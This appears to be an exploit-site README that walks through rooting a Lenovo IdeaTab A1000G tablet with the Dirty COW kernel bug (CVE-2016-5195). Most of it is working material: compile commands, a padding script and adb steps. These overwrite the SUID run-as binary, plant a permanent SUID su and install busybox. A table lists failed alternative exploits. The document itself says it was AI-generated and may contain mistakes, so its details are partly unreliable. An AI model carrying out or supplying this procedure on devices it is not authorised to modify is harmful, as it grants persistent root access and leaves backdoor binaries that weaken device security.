Share
## https://sploitus.com/exploit?id=D7D5D2DE-DBCE-58E9-BB12-14E32746576D
# Lenovo IdeaTab A1000G โ€” Root

> **Note:** This documentation and exploit code was generated with AI assistance (Kiro).
> Verify before use โ€” AI can and does make mistakes.

## Device

| Field | Value |
|-------|-------|
| Model | Lenovo IdeaTab A1000G |
| SoC | MediaTek MT8317 (= MT6517) |
| CPU | Dual-core Cortex-A9 @ 1.2GHz |
| Kernel | Linux 3.4.0 |
| Build | A1000G_A412_01_09_130907_2G |
| Android | 4.1.2 (Jelly Bean) |

## Prerequisites

- USB debugging enabled
- ADB connected
- Android NDK r28+ at `~/Android/Sdk/ndk/`
- `busybox-armv7l` static binary (busybox.net/downloads/binaries/1.21.1/)

## Exploit โ€” CVE-2016-5195 (Dirty COW)

Race condition in kernel `mmap`/`write` path. Affects kernels 2.6.22โ€“4.8.3.
Target: `/system/bin/run-as` (SUID root, 9448 bytes).

### 1. Compile

```bash
NDK=~/Android/Sdk/ndk/28.2.13676358/toolchains/llvm/prebuilt/linux-x86_64/bin
CC=$NDK/armv7a-linux-androideabi21-clang

# dcow exploit
$CC -o dcow -static -march=armv7-a -mfloat-abi=softfp -O1 \
    -UPRINT -UDEBUG "-DLOGV(...)=printf(__VA_ARGS__)" \
    dcow_main.c dirtycow_android.c

# su binary
$CC -o su -march=armv7-a -mfloat-abi=softfp -Os -s -fno-pie -no-pie su2_src.c
```

### 2. Pad su to target size (9448 bytes)

```python
with open('su', 'rb') as f: data = f.read()
data = data + b'\x00' * (9448 - len(data))
with open('su_padded', 'wb') as f: f.write(data)
```

### 3. Run

```bash
adb push dcow su_padded su /data/local/tmp/
adb shell chmod 755 /data/local/tmp/dcow /data/local/tmp/su_padded /data/local/tmp/su
adb shell "/data/local/tmp/dcow /data/local/tmp/su_padded /system/bin/run-as"
# Wait for: [+] Success!
```

### 4. Install su permanently

```bash
# Enter root shell first
adb shell /system/bin/run-as

# Then:
mount -o remount,rw /system
toolbox dd if=/data/local/tmp/su of=/system/bin/su
toolbox chmod 6755 /system/bin/su
toolbox chown root:root /system/bin/su
```

### 5. Install busybox (optional)

```bash
# From PC:
adb push busybox-armv7l /data/local/tmp/busybox

# From root shell:
toolbox dd if=/data/local/tmp/busybox of=/system/bin/busybox
toolbox chmod 755 /system/bin/busybox
/system/bin/busybox --install /system/bin/
```

## Usage

```bash
adb shell
/system/bin/run-as   # drops to root shell (#)
id                   # uid=0(root)
```

> `adb shell /system/bin/su -c cmd` tidak works karena ADB drop setuid.
> Harus masuk interactive shell dulu.

## Post-Root

- `/system/bin/run-as` โ†’ overwritten (original run-as functionality broken)
- `/system/bin/su` โ†’ permanent SUID su binary
- `/system/bin/busybox` โ†’ busybox 1.21.1

## Failed Attempts

| Method | Reason |
|--------|--------|
| CVE-2013-1763 sock_diag | Not compiled into kernel |
| CVE-2013-6282 get_user/put_user | ldrt/strt blocked on Cortex-A9 |
| CVE-2014-3153 Towelroot | Kernel panic โ€” sendmmsg iovstack offset wrong for MTK |
| Framaroot AdbActivity | NullPointerException, incompatible |
| /proc/self/mem overwrite | Kernel addresses inaccessible from userspace |

## Files

```
.
โ”œโ”€โ”€ README.md
โ”œโ”€โ”€ root.sh              # automated root script
โ”œโ”€โ”€ dirtycow_android.c   # CVE-2016-5195 core (Arinerron fork)
โ”œโ”€โ”€ dcow_main.c          # main() wrapper
โ””โ”€โ”€ su2_src.c            # su binary source
```

> Precompiled binaries not included โ€” compile from source using the steps above.

## References

- CVE-2016-5195 source: [Arinerron/CVE-2016-5195](https://github.com/Arinerron/CVE-2016-5195)
- Firmware ROM (different build, used for kernel symbol extraction only):
  [Lenovo_A1000G_MT6577_01_24_130329](https://www.mediafire.com/file/6g1iux9kf1mls2u/Lenovo_A1000G_MT6577_01_24_130329.zip/file)
  โ€” symbols from this ROM work on build `A412_01_09_130907` as both share the same kernel virtual layout